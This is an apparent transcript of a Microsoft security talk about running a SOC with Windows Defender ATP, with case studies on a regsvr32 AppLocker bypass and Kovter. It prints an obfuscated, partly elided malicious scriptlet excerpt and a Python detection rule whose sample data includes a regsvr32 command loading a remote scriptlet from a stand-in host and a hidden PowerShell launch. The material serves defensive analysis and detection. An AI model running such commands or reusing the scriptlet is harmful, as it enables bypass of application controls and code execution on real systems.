How Microsoft uses Windows Defender ATP–Welcome to a SecOps world!

Presentation transcript:

How Microsoft uses Windows Defender ATP–Welcome to a SecOps world!
BRK2060, 5/27/2018 3:50 PM
Brian Hooper, Senior Security Analyst, Microsoft | Digital Security & Risk Engineering
© Microsoft Corporation. All rights reserved. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION.

DSRE Security Monitoring | where we fit.
Security organizations at Microsoft:
- Cyber Defense Operations Center
- Cyber Security Services Engineering
- Digital Crimes Unit
- Digital Security & Risk Engineering
- Microsoft Azure (C+E Security)
- Microsoft Security Response Center (C+E Security)
- Microsoft Threat Intelligence Center (MSTIC)
- Office 365
- Windows & Devices Group

DSRE Security Monitoring | how we are structured.
SOC Structure / SOC Data Sources
- Tier 1 (24x7): Automated alerting (SIEM); Human alerting (User reporting); Proactive mitigation; Remediation & Tracking. Data sources: Host; Network (FW++, IDS++).
- Tier 2 (20x5 + On-call): Tier 1 Escalations; L2 Analysis. Data sources: Automated alerting (SIEM); Windows Defender ATP; Rapid Investigations Consoles.
- Tier 3 (16x5 + On-call): Tier 2 Escalations; L3 Analysis; Root Cause Analysis of Major Incidents; Hunting, Alert Tuning, & PG Feedback; Workflow Automation; Operationalize the Threat. Data sources: SIEM Big Data (Queries & Analytics).
- SOC Engineering: SIEM content + Ops/Maintenance (O&M); Network FW, IDS content + O&M; SOC Design; Monitoring Use Cases.

DSRE Security Monitoring | why endpoint monitoring is hard.
- Massive Scale: 250K+ active users; 300K+ active mailboxes; 500K+ active workstations [not including mobile devices]
- Forward-leaning in OS > even more data per device
- Cloud First
- Highly Mobile: Boundary shifts; Device usage shifts; BYOAnything

DSRE Security Monitoring | how Defender ATP helps.
Management:
- DEPLOY AND MANAGE: Built-in agent, low effort onboarding, no on-prem infrastructure
- CONNECTIVITY: An always-on service for our always connected devices
- SCALE: We have data from all 500K systems and it grows as we grow
Monitoring:
- PRECISION: Intelligent, actionable alerts fueled by Microsoft security experts
- SPEED: Rapid host triage and deep event timeline for investigations
- EFFICIENCY: Enables focused response and enterprise containment

Case Study 1: regsvr32.exe

DSRE Security Monitoring | Case Study 1
[The first case-study slides are screenshots of the alert and the investigation; only the source links and the scriptlet excerpt below survive in the transcript.]

From the article: https://betanews.com/2016/04/25/bypass-applocker-security/
Our alert: [screenshot]

From: https://www.virustotal.com/#/domain/server1.aserdefa.ru
From: https://www.virustotal.com/#/file/9da91192004c51a1315773cb56c1dc6e2cef8b55e66e61d7c1c40d5b3c266cb2/detection

Scriptlet excerpt as shown on the slide (obfuscated; <SNIP> marks content elided on the slide):

    XML version="1.0"
    <scriptlet>
      <registration progid="CLASS" classid="F3011114-0000-0000-0000-4030F1ED1CDC">
        <script language="JScript">
          [CDATA[
          <SNIP>
          wshel = new ActiveXObject(_0xd5bd('0x1b'))
          fso = new ActiveXObject(_0xd5bd('0x1c'))
          if (is_ps_installed() is_dotnet_installed())
            wmi_create_process(pspath _0xd5bd('0x1d') '\x2f\x70\x31\x27\x29\x29', showexec)
          catch (_0x5babc9)
        </script>
      </registration>
    </scriptlet>
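The chain this case study illustrates (a signed, allow-listed regsvr32.exe loading a remote scriptlet whose JScript then starts PowerShell through WMI) written as a small correlation rule over process-creation events. This is an added example, not the talk's alert logic or anything from Windows Defender ATP; the event format, hosts, domain and time window are constructed assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed process-creation events in the style of an EDR host timeline
# (sample data, not real telemetry and not the alert shown in the talk).
SAMPLE_EVENTS = [
    {"host": "ws01", "time": "2018-05-27T15:50:01", "parent": "explorer.exe",
     "image": "regsvr32.exe",
     "cmdline": "regsvr32.exe /s /u /i:http://cdn.example.invalid/update.sct scrobj.dll"},
    {"host": "ws01", "time": "2018-05-27T15:50:04", "parent": "WmiPrvSE.exe",
     "image": "powershell.exe", "cmdline": "powershell.exe -w hidden -NoProfile"},
    {"host": "ws02", "time": "2018-05-27T15:51:00", "parent": "msiexec.exe",
     "image": "regsvr32.exe", "cmdline": "regsvr32.exe /s C:\\Vendor\\vendor.dll"},
    {"host": "ws02", "time": "2018-05-27T16:10:00", "parent": "WmiPrvSE.exe",
     "image": "powershell.exe", "cmdline": "powershell.exe -File C:\\Scripts\\inventory.ps1"},
]

# regsvr32 itself is legitimate; the suspicious part is the /i: argument pointing
# at a remote (http/https) scriptlet instead of a local DLL.
REMOTE_SCRIPTLET = re.compile(r"/i:\s*https?://", re.IGNORECASE)


def is_remote_scriptlet_load(ev):
    return ev["image"].lower() == "regsvr32.exe" and bool(REMOTE_SCRIPTLET.search(ev["cmdline"]))


def is_wmi_spawned_powershell(ev):
    # The scriptlet starts PowerShell through WMI, so the parent is the WMI provider
    # host rather than regsvr32.exe; a plain parent/child rule on regsvr32 would miss it.
    return ev["parent"].lower() == "wmiprvse.exe" and ev["image"].lower() == "powershell.exe"


def _ts(ev):
    return datetime.fromisoformat(ev["time"])


def triage(events, window_seconds=60):
    """Return standalone regsvr32 hits and (regsvr32, powershell) pairs seen on one host."""
    loads = [ev for ev in events if is_remote_scriptlet_load(ev)]
    chained = []
    for load in loads:
        for ev in events:
            if (ev["host"] == load["host"] and is_wmi_spawned_powershell(ev)
                    and timedelta(0) <= _ts(ev) - _ts(load) <= timedelta(seconds=window_seconds)):
                chained.append((load, ev))
    return {"remote_scriptlet_loads": loads, "chained": chained}


if __name__ == "__main__":
    for load, ps in triage(SAMPLE_EVENTS)["chained"]:
        print(f'{load["host"]}: {load["cmdline"]} -> {ps["parent"]} spawned {ps["cmdline"]}')
```

The standalone regsvr32 hit is worth an alert on its own; the chained pair is what the timeline view in an EDR console makes quick to confirm during Tier 2 triage.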

Case Study 2: Kovter

DSRE Security Monitoring | Case Study 2
[The Case Study 2 slides are screenshots; no slide text survives in the transcript.]

Questions?
